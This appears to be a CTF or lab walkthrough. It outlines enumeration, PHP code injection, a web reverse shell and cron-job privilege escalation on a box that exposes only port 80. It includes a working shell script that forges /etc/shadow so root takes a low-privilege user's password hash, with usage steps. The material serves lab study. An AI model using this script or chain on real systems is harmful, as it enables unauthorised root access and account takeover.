HTTP -> code injection -> web reverse shell -> priv esc
1) discovery: which ports are open?
– only port 80 is open
2) enumerate: third-party web platform?
– use gobuster to enumerate the directory structure
– check the website: does it run an open-source platform? any known vulnerabilities for that version?
– are those files really images, or do some have odd sizes compared to the others?
– look for a username and password by enumerating the web pages and image files
– search the web, including research blogs, for the platform and its known issues
3) manipulate the webpage: any possible exploits?
– inject PHP code
4) get a reverse shell: can we turn the injection into a web reverse shell?
– manipulate the HTTP request with Burp
– PHP command shell
5) privilege escalation: any misconfigurations or vulnerabilities?
– run pspy to watch system processes
– focus on cron jobs that run with privileged (root) permissions
– replace the file the cron job copies to /etc/shadow
– copy the normal user's hashed password onto root's entry in /etc/shadow (root's password then equals the normal user's)
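The shadow-file swap from step 5, as an added example (not the original notes' code): it takes a copy of a shadow-format file, replaces root's password field with the hash of a low-privilege user whose password is known, and leaves every other line and field intact so the file the root cron job copies into place is still valid. Copying the hash from the same file is deliberate: it guarantees the algorithm (`$6$` and so on) is one the target's crypt already accepts, which generating a fresh hash elsewhere does not. The sample shadow file, its hashes and the account name `alice` are constructed; where the cron job reads its source file from is an assumption you fill in from pspy.

```shell
#!/bin/sh
# Added example, not from the original write-up. Forges the replacement shadow
# file for the cron-job trick: root's hash becomes the known user's hash.
# The sample shadow file below is constructed; its hashes are not real.

# forge_shadow SRC USER OUT: write OUT as a copy of SRC in which root's
# password field (field 2) holds USER's hash. All other fields are kept.
forge_shadow() {
    src="$1"; user="$2"; out="$3"
    hash=$(awk -F: -v u="$user" '$1 == u { print $2; exit }' "$src")
    # "*" and "!" mean the account has no usable password; refuse those.
    if [ -z "$hash" ] || [ "$hash" = "*" ] || [ "$hash" = "!" ]; then
        echo "forge_shadow: $user has no usable hash in $src" >&2
        return 1
    fi
    awk -F: -v OFS=: -v h="$hash" '$1 == "root" { $2 = h } { print }' "$src" > "$out"
}

# Password field of root in a shadow-format file, for checking the result.
root_hash() {
    awk -F: '$1 == "root" { print $2; exit }' "$1"
}

# A four-line shadow file with made-up sha512crypt-style hashes.
make_demo_shadow() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
root:$6$r00tsalt$ROOTHASHPLACEHOLDER:19000:0:99999:7:::
daemon:*:19000:0:99999:7:::
www-data:*:19000:0:99999:7:::
alice:$6$al1cesalt$ALICEHASHPLACEHOLDER:19000:0:99999:7:::
EOF
    printf '%s\n' "$f"
}

# Usage on the box (the cron job's source path is an assumption; take it from
# pspy output):
#   cp /etc/shadow /tmp/shadow.orig          # keep this to restore afterwards
#   forge_shadow /tmp/shadow.orig alice /path/the/cronjob/copies
#   wait for the next cron run, then: su root   (alice's password now works)
if [ $# -eq 3 ]; then
    forge_shadow "$@"
fi
```

Two checks before dropping the file: run `root_hash` on the output and diff it against the original to be sure only that one field changed, and keep the untouched copy so the original hash can be restored the same way once root access has been proven.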
Tools & References
tools: gobuster, wfuzz, pspy